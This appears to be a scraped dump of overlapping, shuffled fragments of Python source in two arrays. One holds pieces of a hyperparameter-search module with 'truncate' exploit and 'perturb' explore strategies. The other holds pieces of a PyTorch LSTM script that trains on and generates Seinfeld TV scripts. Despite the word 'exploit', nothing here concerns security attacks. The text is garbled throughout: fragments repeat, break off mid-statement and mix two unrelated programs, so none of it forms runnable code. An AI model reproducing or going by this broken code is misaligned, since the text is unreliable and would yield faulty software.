float(self.max_factor), } @classmethod def _from_params(cls,", "if the selected candidate job is in the bottom 20%, it will be", "Args: proportion (float): Proportion of jobs that are considered to be \"best\" jobs,", "Perturb(object): _EXPLORE_STRATEGY_NAME = 'perturb' def __init__(self, min_factor=0.8, max_factor=1.2): ''' Perturb explore strategy: multiply", "by a job in the top 20%. Must satisfy ``0 < proportion <=", "absolute_import, division, print_function, unicode_literals #: Minimize the objective MINIMIZE = 'min' #: Maximize", "Truncate exploit strategy: if the selected candidate job is in the worst n%,", "def _get_params(self): return self.proportion @classmethod def _from_params(cls, params): proportion = float(params) return cls(proportion)", "job in the top n% instead. Args: proportion (float): Proportion of jobs that", "== other.max_factor _EXPLOIT_STRATEGIES = {strat._EXPLOIT_STRATEGY_NAME: strat for strat in [ Truncate ]} _EXPLORE_STRATEGIES", "= 'min' #: Maximize the objective MAXIMIZE = 'max' class Truncate(object): _EXPLOIT_STRATEGY_NAME =", "\"best\" jobs, and \"worst\" jobs. For example, if ``proportion = 0.2``, if the", "the top 20%. Must satisfy ``0 < proportion <= 0.5``. ''' self.proportion =", "Minimize the objective MINIMIZE = 'min' #: Maximize the objective MAXIMIZE = 'max'", "self.proportion = proportion def _get_params(self): return self.proportion @classmethod def _from_params(cls, params): proportion =", "return type(self) == type(other) and \\ self.min_factor == other.min_factor and \\ self.max_factor ==", "import absolute_import, division, print_function, unicode_literals #: Minimize the objective MINIMIZE = 'min' #:", "__init__(self, proportion=0.2): ''' Truncate exploit strategy: if the selected candidate job is in", "it will be replaced by a job in the top 20%. Must satisfy", "float(params['minFactor']) max_factor = float(params['maxFactor']) return cls(min_factor, max_factor) def __eq__(self, other): return type(self) ==", "<= 0.5``. ''' self.proportion = proportion def _get_params(self): return self.proportion @classmethod def _from_params(cls,", "``0 < proportion <= 0.5``. ''' self.proportion = proportion def _get_params(self): return self.proportion", "def _from_params(cls, params): min_factor = float(params['minFactor']) max_factor = float(params['maxFactor']) return cls(min_factor, max_factor) def", "max_factor = float(params['maxFactor']) return cls(min_factor, max_factor) def __eq__(self, other): return type(self) == type(other)", "#: Maximize the objective MAXIMIZE = 'max' class Truncate(object): _EXPLOIT_STRATEGY_NAME = 'truncate' def", "(float): Maximum value for the factor (exclusive). ''' self.min_factor = min_factor self.max_factor =", "n% instead. Args: proportion (float): Proportion of jobs that are considered to be", "and \"worst\" jobs. For example, if ``proportion = 0.2``, if the selected candidate", "0.2``, if the selected candidate job is in the bottom 20%, it will", "__eq__(self, other): return type(self) == type(other) and \\ self.proportion == other.proportion class Perturb(object):", "self.max_factor = max_factor def _get_params(self): return { 'minFactor': float(self.min_factor), 'maxFactor': float(self.max_factor), } @classmethod", "@classmethod def _from_params(cls, params): proportion = float(params) return cls(proportion) def __eq__(self, other): return", "{ 'minFactor': float(self.min_factor), 'maxFactor': float(self.max_factor), } @classmethod def _from_params(cls, params): min_factor = float(params['minFactor'])", "== type(other) and \\ self.min_factor == other.min_factor and \\ self.max_factor == other.max_factor _EXPLOIT_STRATEGIES", "type(other) and \\ self.min_factor == other.min_factor and \\ self.max_factor == other.max_factor _EXPLOIT_STRATEGIES =", "return type(self) == type(other) and \\ self.proportion == other.proportion class Perturb(object): _EXPLORE_STRATEGY_NAME =", "self.proportion == other.proportion class Perturb(object): _EXPLORE_STRATEGY_NAME = 'perturb' def __init__(self, min_factor=0.8, max_factor=1.2): '''", "= 'truncate' def __init__(self, proportion=0.2): ''' Truncate exploit strategy: if the selected candidate", "sampled from a uniform distribution. Args: min_factor (float): Minimum value for the factor", "the factor (exclusive). ''' self.min_factor = min_factor self.max_factor = max_factor def _get_params(self): return", "'min' #: Maximize the objective MAXIMIZE = 'max' class Truncate(object): _EXPLOIT_STRATEGY_NAME = 'truncate'", "Minimum value for the factor (inclusive). max_factor (float): Maximum value for the factor", "= {strat._EXPLOIT_STRATEGY_NAME: strat for strat in [ Truncate ]} _EXPLORE_STRATEGIES = {strat._EXPLORE_STRATEGY_NAME: strat", "value for the factor (exclusive). ''' self.min_factor = min_factor self.max_factor = max_factor def", "worst n%, use a candidate job in the top n% instead. Args: proportion", "''' Perturb explore strategy: multiply the designated hyperparameter by a random factor, sampled", "objective MINIMIZE = 'min' #: Maximize the objective MAXIMIZE = 'max' class Truncate(object):", "the selected candidate job is in the worst n%, use a candidate job", "selected candidate job is in the worst n%, use a candidate job in", "top n% instead. Args: proportion (float): Proportion of jobs that are considered to", "def _get_params(self): return { 'minFactor': float(self.min_factor), 'maxFactor': float(self.max_factor), } @classmethod def _from_params(cls, params):", "\\ self.max_factor == other.max_factor _EXPLOIT_STRATEGIES = {strat._EXPLOIT_STRATEGY_NAME: strat for strat in [ Truncate", "selected candidate job is in the bottom 20%, it will be replaced by", "'truncate' def __init__(self, proportion=0.2): ''' Truncate exploit strategy: if the selected candidate job", "candidate job is in the worst n%, use a candidate job in the", "max_factor=1.2): ''' Perturb explore strategy: multiply the designated hyperparameter by a random factor,", "20%. Must satisfy ``0 < proportion <= 0.5``. ''' self.proportion = proportion def", "random factor, sampled from a uniform distribution. Args: min_factor (float): Minimum value for", "params): proportion = float(params) return cls(proportion) def __eq__(self, other): return type(self) == type(other)", "def __init__(self, min_factor=0.8, max_factor=1.2): ''' Perturb explore strategy: multiply the designated hyperparameter by", "explore strategy: multiply the designated hyperparameter by a random factor, sampled from a", "type(self) == type(other) and \\ self.proportion == other.proportion class Perturb(object): _EXPLORE_STRATEGY_NAME = 'perturb'", "'maxFactor': float(self.max_factor), } @classmethod def _from_params(cls, params): min_factor = float(params['minFactor']) max_factor = float(params['maxFactor'])", "a candidate job in the top n% instead. Args: proportion (float): Proportion of", "= float(params['maxFactor']) return cls(min_factor, max_factor) def __eq__(self, other): return type(self) == type(other) and", "float(params) return cls(proportion) def __eq__(self, other): return type(self) == type(other) and \\ self.proportion", "from __future__ import absolute_import, division, print_function, unicode_literals #: Minimize the objective MINIMIZE =", "the top n% instead. Args: proportion (float): Proportion of jobs that are considered", "= float(params['minFactor']) max_factor = float(params['maxFactor']) return cls(min_factor, max_factor) def __eq__(self, other): return type(self)", "strategy: if the selected candidate job is in the worst n%, use a", "value for the factor (inclusive). max_factor (float): Maximum value for the factor (exclusive).", "proportion (float): Proportion of jobs that are considered to be \"best\" jobs, and", "< proportion <= 0.5``. ''' self.proportion = proportion def _get_params(self): return self.proportion @classmethod", "'minFactor': float(self.min_factor), 'maxFactor': float(self.max_factor), } @classmethod def _from_params(cls, params): min_factor = float(params['minFactor']) max_factor", "max_factor) def __eq__(self, other): return type(self) == type(other) and \\ self.min_factor == other.min_factor", "\\ self.proportion == other.proportion class Perturb(object): _EXPLORE_STRATEGY_NAME = 'perturb' def __init__(self, min_factor=0.8, max_factor=1.2):", "factor (exclusive). ''' self.min_factor = min_factor self.max_factor = max_factor def _get_params(self): return {", "and \\ self.proportion == other.proportion class Perturb(object): _EXPLORE_STRATEGY_NAME = 'perturb' def __init__(self, min_factor=0.8,", "a random factor, sampled from a uniform distribution. Args: min_factor (float): Minimum value", "factor, sampled from a uniform distribution. Args: min_factor (float): Minimum value for the", "Proportion of jobs that are considered to be \"best\" jobs, and \"worst\" jobs.", "proportion = float(params) return cls(proportion) def __eq__(self, other): return type(self) == type(other) and", "(float): Minimum value for the factor (inclusive). max_factor (float): Maximum value for the", "== other.proportion class Perturb(object): _EXPLORE_STRATEGY_NAME = 'perturb' def __init__(self, min_factor=0.8, max_factor=1.2): ''' Perturb", "self.min_factor == other.min_factor and \\ self.max_factor == other.max_factor _EXPLOIT_STRATEGIES = {strat._EXPLOIT_STRATEGY_NAME: strat for", "def _from_params(cls, params): proportion = float(params) return cls(proportion) def __eq__(self, other): return type(self)", "be replaced by a job in the top 20%. Must satisfy ``0 <", "a uniform distribution. Args: min_factor (float): Minimum value for the factor (inclusive). max_factor", "_get_params(self): return self.proportion @classmethod def _from_params(cls, params): proportion = float(params) return cls(proportion) def", "and \\ self.max_factor == other.max_factor _EXPLOIT_STRATEGIES = {strat._EXPLOIT_STRATEGY_NAME: strat for strat in [", "''' Truncate exploit strategy: if the selected candidate job is in the worst", "= max_factor def _get_params(self): return { 'minFactor': float(self.min_factor), 'maxFactor': float(self.max_factor), } @classmethod def", "a job in the top 20%. Must satisfy ``0 < proportion <= 0.5``.", "__future__ import absolute_import, division, print_function, unicode_literals #: Minimize the objective MINIMIZE = 'min'", "= 'max' class Truncate(object): _EXPLOIT_STRATEGY_NAME = 'truncate' def __init__(self, proportion=0.2): ''' Truncate exploit", "the worst n%, use a candidate job in the top n% instead. Args:", "== other.min_factor and \\ self.max_factor == other.max_factor _EXPLOIT_STRATEGIES = {strat._EXPLOIT_STRATEGY_NAME: strat for strat", "\"worst\" jobs. For example, if ``proportion = 0.2``, if the selected candidate job", "class Truncate(object): _EXPLOIT_STRATEGY_NAME = 'truncate' def __init__(self, proportion=0.2): ''' Truncate exploit strategy: if", "@classmethod def _from_params(cls, params): min_factor = float(params['minFactor']) max_factor = float(params['maxFactor']) return cls(min_factor, max_factor)", "return cls(min_factor, max_factor) def __eq__(self, other): return type(self) == type(other) and \\ self.min_factor", "uniform distribution. Args: min_factor (float): Minimum value for the factor (inclusive). max_factor (float):", "are considered to be \"best\" jobs, and \"worst\" jobs. For example, if ``proportion", "def __init__(self, proportion=0.2): ''' Truncate exploit strategy: if the selected candidate job is", "return self.proportion @classmethod def _from_params(cls, params): proportion = float(params) return cls(proportion) def __eq__(self,", "_EXPLOIT_STRATEGY_NAME = 'truncate' def __init__(self, proportion=0.2): ''' Truncate exploit strategy: if the selected", "n%, use a candidate job in the top n% instead. Args: proportion (float):", "in the top n% instead. Args: proportion (float): Proportion of jobs that are", "job is in the worst n%, use a candidate job in the top", "and \\ self.min_factor == other.min_factor and \\ self.max_factor == other.max_factor _EXPLOIT_STRATEGIES = {strat._EXPLOIT_STRATEGY_NAME:", "'max' class Truncate(object): _EXPLOIT_STRATEGY_NAME = 'truncate' def __init__(self, proportion=0.2): ''' Truncate exploit strategy:", "self.proportion @classmethod def _from_params(cls, params): proportion = float(params) return cls(proportion) def __eq__(self, other):", "replaced by a job in the top 20%. Must satisfy ``0 < proportion", "bottom 20%, it will be replaced by a job in the top 20%.", "the designated hyperparameter by a random factor, sampled from a uniform distribution. Args:" ]
[ "current_seq = torch.LongTensor(current_seq).cuda() else: current_seq = torch.LongTensor(current_seq) # initialize the hidden state hidden", "int_to_vocab: Dict of word id keys to word values :param token_dict: Dict of", ":param words: The word ids of the TV scripts :param sequence_length: The sequence", "self.lstm(x, hidden) x = x.contiguous().view(-1, self.hidden_dim) # x = self.dropout(x) x = self.fc(x)", "rnn.cuda() # defining loss and optimization functions for training optimizer = torch.optim.Adam(rnn.parameters(), lr=learning_rate)", "= np.array(targets) train_data = TensorDataset(torch.from_numpy(train_x), torch.from_numpy(train_y)) train_loader = DataLoader(train_data, shuffle=False, batch_size=batch_size) # return", "data loader - do not change train_loader = batch_data(int_text, sequence_length, batch_size) # Training", "self.hidden_dim).zero_()) return hidden def forward_back_prop(rnn, optimizer, criterion, inp, target, hidden): \"\"\" Forward and", "# perform backpropagation and optimization h = tuple([each.data for each in hidden]) rnn.zero_grad()", "batch_size, self.hidden_dim).zero_()) return hidden def forward_back_prop(rnn, optimizer, criterion, inp, target, hidden): \"\"\" Forward", "= torch.optim.Adam(rnn.parameters(), lr=learning_rate) criterion = nn.CrossEntropyLoss() # training the model trained_rnn = train_rnn(rnn,", ":param criterion: The PyTorch loss function :param inp: A batch of input to", "return rnn # Data params # Sequence Length sequence_length = 8 # of", "helper.load_preprocess() trained_rnn = helper.load_model('./trained_tv_script') import torch.nn.functional as F def generate(rnn, prime_id, int_to_vocab, token_dict,", "get the index of the next word top_k = 5 p, top_i =", "sequence_length, batch_size) # Training parameters # Number of Epochs num_epochs = 5 #", "a GPU to train your neural network.') def create_lookup_tables(text): \"\"\" Create lookup tables", "if (train_on_gpu): hidden = (weight.new(self.n_layers, batch_size, self.hidden_dim).zero_().cuda(), weight.new(self.n_layers, batch_size, self.hidden_dim).zero_().cuda()) else: hidden =", "generated text \"\"\" rnn.eval() # create a sequence (batch_size=1) with the prime_id current_seq", "nn.Dropout(dropout) def forward(self, nn_input, hidden): \"\"\" Forward propagation of the neural network :param", "self.hidden_dim = hidden_dim # define model layers self.embedding = nn.Embedding(vocab_size, embedding_dim) self.lstm =", "np.array(targets) train_data = TensorDataset(torch.from_numpy(train_x), torch.from_numpy(train_y)) train_loader = DataLoader(train_data, shuffle=False, batch_size=batch_size) # return a", "The number of output dimensions of the neural network :param embedding_dim: The size", "neural network :param nn_input: The input to the neural network :param hidden: The", "run the cell multiple times to get different results! gen_length = 400 #", "from the dictionary word = int_to_vocab[word_i] predicted.append(word) # the generated word becomes the", "in range(0, total): x = words[idx:idx+sequence_length] features.append(x) y = words[idx+sequence_length] targets.append(y) train_x =", "= train_rnn(rnn, batch_size, optimizer, criterion, num_epochs, show_every_n_batches) # saving the trained model helper.save_model('./trained_tv_script',", "The size of each batch; the number of sequences in a batch :return:", "neural network :param target: The target output for the batch of input :return:", "a sequence :param predict_len: The length of text to generate :return: The generated", "} helper.preprocess_and_save_data(data_dir, token_lookup, create_lookup_tables) def batch_data(words, sequence_length, batch_size): \"\"\" Batch the neural network", "pad_value: The value used to pad a sequence :param predict_len: The length of", "= word_i gen_sentences = ' '.join(predicted) # Replace punctuation tokens for key, token", "for key, token in token_dict.items(): ending = ' ' if key in ['\\n',", "return vocab_to_int, int_to_vocab def token_lookup(): \"\"\" Generate a dict to turn punctuation into", "them :param hidden_dim: The size of the hidden layer outputs :param dropout: dropout", "completely full batches, only n_batches = len(train_loader.dataset)//batch_size if(batch_i > n_batches): break # forward,", "= gen_sentences.replace(' ' + token.lower(), key) gen_sentences = gen_sentences.replace('\\n ', '\\n') gen_sentences =", "the hidden state return x, h def init_hidden(self, batch_size): ''' Initialize the hidden", "GPU found. Please use a GPU to train your neural network.') def create_lookup_tables(text):", "and the value is the token \"\"\" return { '.': '||PERIOD||', ',': '||COMMA||',", "decoder_optimizer: The PyTorch optimizer for the neural network :param criterion: The PyTorch loss", "hidden state hidden = rnn.init_hidden(current_seq.size(0)) # get the output of the rnn output,", "# defining loss and optimization functions for training optimizer = torch.optim.Adam(rnn.parameters(), lr=learning_rate) criterion", "batch_size) # Training parameters # Number of Epochs num_epochs = 5 # Learning", "to your preference prime_word = 'jerry' # name for starting the script \"\"\"", "dictionary word = int_to_vocab[word_i] predicted.append(word) # the generated word becomes the next \"current", "can continue current_seq = np.roll(current_seq, -1, 1) current_seq[-1][-1] = word_i gen_sentences = '", "{:>4}/{:<4} Loss: {}\\n'.format( epoch_i, n_epochs, np.average(batch_losses))) batch_losses = [] # returns a trained", "optimizer, criterion, inp, target, hidden): \"\"\" Forward and backward propagation on the neural", "is the token \"\"\" return { '.': '||PERIOD||', ',': '||COMMA||', '\"': '||QUOTATION_MARK||', ';':", "you iterate over completely full batches, only n_batches = len(train_loader.dataset)//batch_size if(batch_i > n_batches):", "word_counts = Counter(text) sorted_vocab = sorted(word_counts, key=word_counts.get, reverse=True) int_to_vocab = {ii: word for", "for a GPU train_on_gpu = torch.cuda.is_available() if not train_on_gpu: print('No GPU found. Please", "self.hidden_dim).zero_(), weight.new(self.n_layers, batch_size, self.hidden_dim).zero_()) return hidden def forward_back_prop(rnn, optimizer, criterion, inp, target, hidden):", "1): # initialize hidden state hidden = rnn.init_hidden(batch_size) for batch_i, (inputs, labels) in", "batch :param batch_size: The size of each batch; the number of sequences in", "print(int_text[:10]) print(list(vocab_to_int.values())[:10]) print(list(int_to_vocab.values())[:10]) class RNN(nn.Module): def __init__(self, vocab_size, output_size, embedding_dim, hidden_dim, n_layers, dropout=0.5):", "sequence # Batch Size batch_size = 100 # data loader - do not", "rnn.train() print(\"Training for %d epoch(s)...\" % n_epochs) for epoch_i in range(1, n_epochs +", "for %d epoch(s)...\" % n_epochs) for epoch_i in range(1, n_epochs + 1): #", "helper import numpy as np import torch import torch.nn as nn from string", "puncuation values :param pad_value: The value used to pad a sequence :param predict_len:", "latest hidden state Tensor \"\"\" # move data to GPU, if available if", "different results! gen_length = 400 # modify the length to your preference prime_word", "# name for starting the script \"\"\" DON'T MODIFY ANYTHING IN THIS CELL", "continue current_seq = np.roll(current_seq, -1, 1) current_seq[-1][-1] = word_i gen_sentences = ' '.join(predicted)", "word ids of the TV scripts :param sequence_length: The sequence length of each", "trained neural network :param prime_id: The word id to start the first prediction", "= nn.Linear(hidden_dim, output_size) self.dropout = nn.Dropout(dropout) def forward(self, nn_input, hidden): \"\"\" Forward propagation", "neural network :param decoder_optimizer: The PyTorch optimizer for the neural network :param criterion:", "np.full((1, sequence_length), pad_value) current_seq[-1][-1] = prime_id predicted = [int_to_vocab[prime_id]] for _ in range(predict_len):", "{ '.': '||PERIOD||', ',': '||COMMA||', '\"': '||QUOTATION_MARK||', ';': '||SEMICOLON||', '!': '||EXCLAMATION_MARK||', '?': '||QUESTION_MARK||',", "# initialize the hidden state hidden = rnn.init_hidden(current_seq.size(0)) # get the output of", "state hidden = rnn.init_hidden(current_seq.size(0)) # get the output of the rnn output, _", "(inputs, labels) in enumerate(train_loader, 1): # make sure you iterate over completely full", "batch_size = 100 # data loader - do not change train_loader = batch_data(int_text,", "nn_input.size(0) x = self.embedding(nn_input) x,h = self.lstm(x, hidden) x = x.contiguous().view(-1, self.hidden_dim) #", "to get different results! gen_length = 400 # modify the length to your", "self.n_layers = n_layers self.hidden_dim = hidden_dim # define model layers self.embedding = nn.Embedding(vocab_size,", "(train_on_gpu): hidden = (weight.new(self.n_layers, batch_size, self.hidden_dim).zero_().cuda(), weight.new(self.n_layers, batch_size, self.hidden_dim).zero_().cuda()) else: hidden = (weight.new(self.n_layers,", "stats for every n number of batches show_every_n_batches = 500 # create model", "p = p.cpu() # move to cpu # use top_k sampling to get", "np.array(features) train_y = np.array(targets) train_data = TensorDataset(torch.from_numpy(train_x), torch.from_numpy(train_y)) train_loader = DataLoader(train_data, shuffle=False, batch_size=batch_size)", "# Output size output_size = vocab_size # Embedding Dimension embedding_dim = 128 #", "show_every_n_batches == 0: print('Epoch: {:>4}/{:<4} Loss: {}\\n'.format( epoch_i, n_epochs, np.average(batch_losses))) batch_losses = []", "generate :return: The generated text \"\"\" rnn.eval() # create a sequence (batch_size=1) with", "network :param decoder: The PyTorch Module that holds the trained neural network :param", "'-': '||DASH||', '\\n': '||RETURN||', } helper.preprocess_and_save_data(data_dir, token_lookup, create_lookup_tables) def batch_data(words, sequence_length, batch_size): \"\"\"", "of tv scripts split into words :return: A tuple of dicts (vocab_to_int, int_to_vocab)", "index with some element of randomness p = p.numpy().squeeze() word_i = np.random.choice(top_i, p=p/p.sum())", "batch :return: DataLoader with batched data \"\"\" n_batches = len(words)//batch_size words = words[:n_batches*batch_size]", "predict_len: The length of text to generate :return: The generated text \"\"\" rnn.eval()", "in enumerate(sorted_vocab)} vocab_to_int = {word: ii for ii, word in int_to_vocab.items()} return vocab_to_int,", "top_i = p.topk(top_k) top_i = top_i.numpy().squeeze() # select the likely next word index", "if train_on_gpu: inp, target = inp.cuda(), target.cuda() # perform backpropagation and optimization h", "of the next word top_k = 5 p, top_i = p.topk(top_k) top_i =", "IS BELOW THIS LINE \"\"\" pad_word = helper.SPECIAL_WORDS['PADDING'] generated_script = generate(trained_rnn, vocab_to_int[prime_word +", "vocab_size, output_size, embedding_dim, hidden_dim, n_layers, dropout=0.5): \"\"\" Initialize the PyTorch RNN Module :param", "else: hidden = (weight.new(self.n_layers, batch_size, self.hidden_dim).zero_(), weight.new(self.n_layers, batch_size, self.hidden_dim).zero_()) return hidden def forward_back_prop(rnn,", "# data loader - do not change train_loader = batch_data(int_text, sequence_length, batch_size) #", "p=p/p.sum()) # retrieve that word from the dictionary word = int_to_vocab[word_i] predicted.append(word) #", "neural network :param prime_id: The word id to start the first prediction :param", "# modify the length to your preference prime_word = 'jerry' # name for", "torch import torch.nn as nn from string import punctuation from collections import Counter", "prediction :param int_to_vocab: Dict of word id keys to word values :param token_dict:", "IN THIS CELL THAT IS BELOW THIS LINE \"\"\" pad_word = helper.SPECIAL_WORDS['PADDING'] generated_script", "self.output_size = output_size self.n_layers = n_layers self.hidden_dim = hidden_dim # define model layers", "train_on_gpu: rnn.cuda() # defining loss and optimization functions for training optimizer = torch.optim.Adam(rnn.parameters(),", "back prop loss, hidden = forward_back_prop(rnn, optimizer, criterion, inputs, labels, hidden) # record", "the latest hidden state \"\"\" batch_size = nn_input.size(0) x = self.embedding(nn_input) x,h =", "Forward propagation of the neural network :param nn_input: The input to the neural", "keys to puncuation values :param pad_value: The value used to pad a sequence", "show_every_n_batches=100): batch_losses = [] rnn.train() print(\"Training for %d epoch(s)...\" % n_epochs) for epoch_i", "holds the trained neural network :param prime_id: The word id to start the", "words in a sequence # Batch Size batch_size = 100 # data loader", "layer outputs :param dropout: dropout to add in between LSTM/GRU layers \"\"\" super(RNN,", "x = x[:, -1] # return one batch of output word scores and", "optimization h = tuple([each.data for each in hidden]) rnn.zero_grad() output, h = rnn(inp,", "if available if train_on_gpu: inp, target = inp.cuda(), target.cuda() # perform backpropagation and", "# set class variables self.output_size = output_size self.n_layers = n_layers self.hidden_dim = hidden_dim", ":param decoder_optimizer: The PyTorch optimizer for the neural network :param criterion: The PyTorch", "= {ii: word for ii, word in enumerate(sorted_vocab)} vocab_to_int = {word: ii for", "labels) in enumerate(train_loader, 1): # make sure you iterate over completely full batches,", "sequence :param predict_len: The length of text to generate :return: The generated text", "Generate text using the neural network :param decoder: The PyTorch Module that holds", "# of words in a sequence # Batch Size batch_size = 100 #", "that word from the dictionary word = int_to_vocab[word_i] predicted.append(word) # the generated word", "scripts split into words :return: A tuple of dicts (vocab_to_int, int_to_vocab) \"\"\" word_counts", "network :param nn_input: The input to the neural network :param hidden: The hidden", "in range(1, n_epochs + 1): # initialize hidden state hidden = rnn.init_hidden(batch_size) for", "prime_id current_seq = np.full((1, sequence_length), pad_value) current_seq[-1][-1] = prime_id predicted = [int_to_vocab[prime_id]] for", "gen_sentences = gen_sentences.replace(' ' + token.lower(), key) gen_sentences = gen_sentences.replace('\\n ', '\\n') gen_sentences", "predicted = [int_to_vocab[prime_id]] for _ in range(predict_len): if train_on_gpu: current_seq = torch.LongTensor(current_seq).cuda() else:", "and optimization h = tuple([each.data for each in hidden]) rnn.zero_grad() output, h =", ":param sequence_length: The sequence length of each batch :param batch_size: The size of", "Batch Size batch_size = 100 # data loader - do not change train_loader", "x = words[idx:idx+sequence_length] features.append(x) y = words[idx+sequence_length] targets.append(y) train_x = np.array(features) train_y =", "hidden_dim) ''' # Implement function weight = next(self.parameters()).data if (train_on_gpu): hidden = (weight.new(self.n_layers,", "Model parameters # Vocab size vocab_size = len(vocab_to_int) # Output size output_size =", "in a sequence # Batch Size batch_size = 100 # data loader -", "show_every_n_batches) # saving the trained model helper.save_model('./trained_tv_script', trained_rnn) print('Model Trained and Saved') _,", "else: current_seq = torch.LongTensor(current_seq) # initialize the hidden state hidden = rnn.init_hidden(current_seq.size(0)) #", "n_epochs, np.average(batch_losses))) batch_losses = [] # returns a trained rnn return rnn #", "500 # create model and move to gpu if available rnn = RNN(vocab_size,", "The PyTorch optimizer for the neural network :param criterion: The PyTorch loss function", "self.lstm = nn.LSTM(embedding_dim, hidden_dim, n_layers, dropout=dropout, batch_first=True) self.fc = nn.Linear(hidden_dim, output_size) self.dropout =", "n_layers self.hidden_dim = hidden_dim # define model layers self.embedding = nn.Embedding(vocab_size, embedding_dim) self.lstm", "p.numpy().squeeze() word_i = np.random.choice(top_i, p=p/p.sum()) # retrieve that word from the dictionary word", "the number of sequences in a batch :return: DataLoader with batched data \"\"\"", "of each batch :param batch_size: The size of each batch; the number of", "sequence (batch_size=1) with the prime_id current_seq = np.full((1, sequence_length), pad_value) current_seq[-1][-1] = prime_id", "p = F.softmax(output, dim=1).data if(train_on_gpu): p = p.cpu() # move to cpu #", "values :param token_dict: Dict of puncuation tokens keys to puncuation values :param pad_value:", "x = x.view(batch_size, -1, self.output_size) x = x[:, -1] # return one batch", "results! gen_length = 400 # modify the length to your preference prime_word =", "for epoch_i in range(1, n_epochs + 1): # initialize hidden state hidden =", "the length to your preference prime_word = 'jerry' # name for starting the", "output_size self.n_layers = n_layers self.hidden_dim = hidden_dim # define model layers self.embedding =", "of output dimensions of the neural network :param embedding_dim: The size of embeddings,", "model layers self.embedding = nn.Embedding(vocab_size, embedding_dim) self.lstm = nn.LSTM(embedding_dim, hidden_dim, n_layers, dropout=dropout, batch_first=True)", ":return: hidden state of dims (n_layers, batch_size, hidden_dim) ''' # Implement function weight", "as nn from string import punctuation from collections import Counter from torch.utils.data import", "# define model layers self.embedding = nn.Embedding(vocab_size, embedding_dim) self.lstm = nn.LSTM(embedding_dim, hidden_dim, n_layers,", "rnn return rnn # Data params # Sequence Length sequence_length = 8 #", "string import punctuation from collections import Counter from torch.utils.data import TensorDataset, DataLoader data_dir", "= gen_sentences.replace('\\n ', '\\n') gen_sentences = gen_sentences.replace('( ', '(') # return all the", "= helper.SPECIAL_WORDS['PADDING'] generated_script = generate(trained_rnn, vocab_to_int[prime_word + ':'], int_to_vocab, token_dict, vocab_to_int[pad_word], gen_length) print(generated_script)", "top_i.numpy().squeeze() # select the likely next word index with some element of randomness", "optimizer.step() # return the loss over a batch and the hidden state produced", "target, hidden): \"\"\" Forward and backward propagation on the neural network :param decoder:", "lr=learning_rate) criterion = nn.CrossEntropyLoss() # training the model trained_rnn = train_rnn(rnn, batch_size, optimizer,", "return x, h def init_hidden(self, batch_size): ''' Initialize the hidden state of an", "word values :param token_dict: Dict of puncuation tokens keys to puncuation values :param", "# use top_k sampling to get the index of the next word top_k", "embedding_dim = 128 # Hidden Dimension hidden_dim = 512 # Number of RNN", "x[:, -1] # return one batch of output word scores and the hidden", "of sequences in a batch :return: DataLoader with batched data \"\"\" n_batches =", "output of the rnn output, _ = rnn(current_seq, hidden) # get the next", "y = words[idx+sequence_length] targets.append(y) train_x = np.array(features) train_y = np.array(targets) train_data = TensorDataset(torch.from_numpy(train_x),", "generated word becomes the next \"current sequence\" and the cycle can continue current_seq", "neural network :param hidden: The hidden state :return: Two Tensors, the output of", "neural network data using DataLoader :param words: The word ids of the TV", "vocab_size # Embedding Dimension embedding_dim = 128 # Hidden Dimension hidden_dim = 512", "the neural network :param decoder: The PyTorch Module that holds the trained neural", "token.lower(), key) gen_sentences = gen_sentences.replace('\\n ', '\\n') gen_sentences = gen_sentences.replace('( ', '(') #", "network (the size of the vocabulary) :param output_size: The number of output dimensions", "= prime_id predicted = [int_to_vocab[prime_id]] for _ in range(predict_len): if train_on_gpu: current_seq =", "of RNN Layers n_layers = 2 # Show stats for every n number", "batch and the hidden state produced by our model return loss.item(), h def", "> n_batches): break # forward, back prop loss, hidden = forward_back_prop(rnn, optimizer, criterion,", "= [] # returns a trained rnn return rnn # Data params #", "Saved') _, vocab_to_int, int_to_vocab, token_dict = helper.load_preprocess() trained_rnn = helper.load_model('./trained_tv_script') import torch.nn.functional as", "0.001 # Model parameters # Vocab size vocab_size = len(vocab_to_int) # Output size", "token_dict.items(): ending = ' ' if key in ['\\n', '(', '\"'] else ''", "network :param prime_id: The word id to start the first prediction :param int_to_vocab:", "batch_size: The size of each batch; the number of sequences in a batch", "'(') # return all the sentences return gen_sentences # run the cell multiple", "preference prime_word = 'jerry' # name for starting the script \"\"\" DON'T MODIFY", "512 # Number of RNN Layers n_layers = 2 # Show stats for", ":param pad_value: The value used to pad a sequence :param predict_len: The length", "move to gpu if available rnn = RNN(vocab_size, output_size, embedding_dim, hidden_dim, n_layers, dropout=0.5)", "def forward(self, nn_input, hidden): \"\"\" Forward propagation of the neural network :param nn_input:", "in int_to_vocab.items()} return vocab_to_int, int_to_vocab def token_lookup(): \"\"\" Generate a dict to turn", "'||QUOTATION_MARK||', ';': '||SEMICOLON||', '!': '||EXCLAMATION_MARK||', '?': '||QUESTION_MARK||', '(': '||LEFT_PAREN>||', ')': '||RIGHT_PAREN||', '-': '||DASH||',", "used to pad a sequence :param predict_len: The length of text to generate", "pad_word = helper.SPECIAL_WORDS['PADDING'] generated_script = generate(trained_rnn, vocab_to_int[prime_word + ':'], int_to_vocab, token_dict, vocab_to_int[pad_word], gen_length)", "= torch.LongTensor(current_seq).cuda() else: current_seq = torch.LongTensor(current_seq) # initialize the hidden state hidden =", "make sure you iterate over completely full batches, only n_batches = len(train_loader.dataset)//batch_size if(batch_i", "size vocab_size = len(vocab_to_int) # Output size output_size = vocab_size # Embedding Dimension", "the output of the neural network and the latest hidden state \"\"\" batch_size", "= nn_input.size(0) x = self.embedding(nn_input) x,h = self.lstm(x, hidden) x = x.contiguous().view(-1, self.hidden_dim)", "def batch_data(words, sequence_length, batch_size): \"\"\" Batch the neural network data using DataLoader :param", "id to start the first prediction :param int_to_vocab: Dict of word id keys", "= forward_back_prop(rnn, optimizer, criterion, inputs, labels, hidden) # record loss batch_losses.append(loss) # printing", "the token \"\"\" return { '.': '||PERIOD||', ',': '||COMMA||', '\"': '||QUOTATION_MARK||', ';': '||SEMICOLON||',", "data_dir = './data/Seinfeld_Scripts.txt' text = helper.load_data(data_dir) # Check for a GPU train_on_gpu =", "next(self.parameters()).data if (train_on_gpu): hidden = (weight.new(self.n_layers, batch_size, self.hidden_dim).zero_().cuda(), weight.new(self.n_layers, batch_size, self.hidden_dim).zero_().cuda()) else: hidden", "network and the latest hidden state \"\"\" batch_size = nn_input.size(0) x = self.embedding(nn_input)", "5) optimizer.step() # return the loss over a batch and the hidden state", "num_epochs, show_every_n_batches) # saving the trained model helper.save_model('./trained_tv_script', trained_rnn) print('Model Trained and Saved')", "optimization functions for training optimizer 